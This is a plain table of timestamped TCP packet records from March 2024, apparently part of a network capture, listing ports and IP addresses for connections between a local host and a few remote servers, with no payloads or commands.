Mar 28, 2024 09:15:00.307964087 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.307977915 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.308043957 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.308609009 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.308648109 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.308897972 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.308928967 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.308952093 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.309019089 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.309326887 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.309360027 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.309600115 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.309644938 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.309684992 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.310128927 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.310158968 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.310187101 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.310478926 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.310817957 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.310826063 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.311146975 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.311161041 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.311197042 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.311270952 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.311803102 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.311817884 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.311897039 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.312737942 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.312787056 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.312807083 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.312839985 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.312877893 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.312881947 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.312913895 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.313395023 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.313402891 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.313469887 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.313770056 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.313813925 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.313956022 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.314045906 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.314054012 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.314551115 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.314558029 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.314582109 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.315249920 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.315277100 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.315299034 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.315304041 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.315323114 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.315507889 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.315856934 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.315859079 CET	49773	443	192.168.2.4	45.130.41.108
Mar 28, 2024 09:15:00.315874100 CET	443	49773	45.130.41.108	192.168.2.4
Mar 28, 2024 09:15:00.315987110 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.316009045 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.316114902 CET	443	49773	45.130.41.108	192.168.2.4
Mar 28, 2024 09:15:00.316164017 CET	49773	443	192.168.2.4	45.130.41.108
Mar 28, 2024 09:15:00.316164970 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.316807032 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.316847086 CET	49773	443	192.168.2.4	45.130.41.108
Mar 28, 2024 09:15:00.316879034 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.317521095 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.317589045 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.317610025 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.317648888 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.318212986 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.318281889 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.318404913 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.319062948 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.319111109 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.319190979 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.319737911 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.319782019 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.319873095 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.320188046 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.320267916 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.320267916 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.320441961 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.320486069 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.320565939 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.320632935 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.320677996 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.320720911 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.320722103 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.322474003 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.322556019 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.322650909 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.322726965 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.322762012 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.325783968 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.327385902 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.327549934 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.329932928 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330049038 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330115080 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330173016 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330190897 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330203056 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330205917 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330319881 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330365896 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330372095 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330396891 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330462933 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330492020 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330502987 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330528975 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330586910 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330667973 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330686092 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330708027 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330764055 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330799103 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330828905 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330899954 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330902100 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.330939054 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.330957890 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331020117 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331032991 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.331032991 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.331090927 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331142902 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331156015 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.331188917 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331207991 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.331233025 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331248045 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331294060 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.331294060 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.331299067 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331368923 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331902981 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331911087 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.331932068 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.332026958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.332067013 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.332096100 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.332143068 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.332170963 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.332228899 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.332248926 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.332278967 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.332278967 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.332318068 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.332338095 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.332365036 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.332374096 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.332382917 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.332398891 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.332416058 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.332417011 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.332432032 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.332458019 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.332458019 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.332992077 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.333010912 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.333137035 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.333146095 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.333153009 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.333204985 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.333205938 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.334033012 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.334131002 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.334212065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.334266901 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.334330082 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.334331036 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.334528923 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.334567070 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.335277081 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.335285902 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.335309982 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.335793972 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.335825920 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.335853100 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.335993052 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.336016893 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.336085081 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.336688995 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.336725950 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.336741924 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.337423086 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.337441921 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.337465048 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.337647915 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.338190079 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.338221073 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.338970900 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.338978052 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.339005947 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.339771986 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.339780092 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.339802980 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.340642929 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.340687037 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.340691090 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.340754032 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.340769053 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.340770960 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.340931892 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.340976000 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.341021061 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.341021061 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.341084003 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.341150999 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.341649055 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.342030048 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.342108011 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.342614889 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.342685938 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.342700958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.343202114 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.343218088 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.343242884 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.343274117 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.343281031 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.343302965 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.344085932 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.344136953 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.344165087 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.344825983 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.344870090 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.344892979 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.345383883 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.345385075 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.345391989 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.345464945 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.345622063 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.345681906 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.345695019 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.345817089 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.346357107 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.346425056 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.346446037 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.346524000 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.347058058 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.347069979 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.347122908 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.347124100 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.347878933 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.347896099 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.347954035 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.347980976 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.347985983 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.348465919 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.348474026 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.348496914 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.349169970 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.349189997 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.349212885 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.349663019 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.349884033 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.349891901 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.350002050 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.350043058 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.350065947 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.350682974 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.350727081 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.350753069 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.351402998 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.351409912 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.351437092 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.352170944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.352184057 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.352209091 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.352365971 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.352560997 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.352902889 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.352910995 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.352962017 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.352962971 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.353720903 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.353728056 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.354417086 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.354437113 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.354816914 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.354824066 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.354846954 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.355241060 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.355271101 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.355287075 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.355958939 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.355999947 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.356021881 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.356349945 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.356564999 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.356584072 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.357024908 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.357296944 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.357335091 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.357351065 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.357445002 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.358305931 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.358342886 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.358808994 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.358829021 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.358831882 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.359375000 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.359394073 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.359416008 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.359575033 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.359592915 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.359618902 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.360300064 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.360307932 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.360348940 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.361088037 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.361104012 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.361126900 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.361536980 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.361593008 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.361614943 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.361649990 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.361793995 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.361825943 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.362024069 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.362045050 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.362066031 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.362593889 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.362610102 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.362637043 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.363428116 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.363456011 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.363481045 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.363928080 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.364005089 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.364007950 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.364052057 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.364073038 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.364073038 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.364151001 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.364223003 CET	443	49773	45.130.41.108	192.168.2.4
Mar 28, 2024 09:15:00.364729881 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.364737988 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.365452051 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.365484953 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.365494013 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.365647078 CET	49736	80	192.168.2.4	5.42.66.22
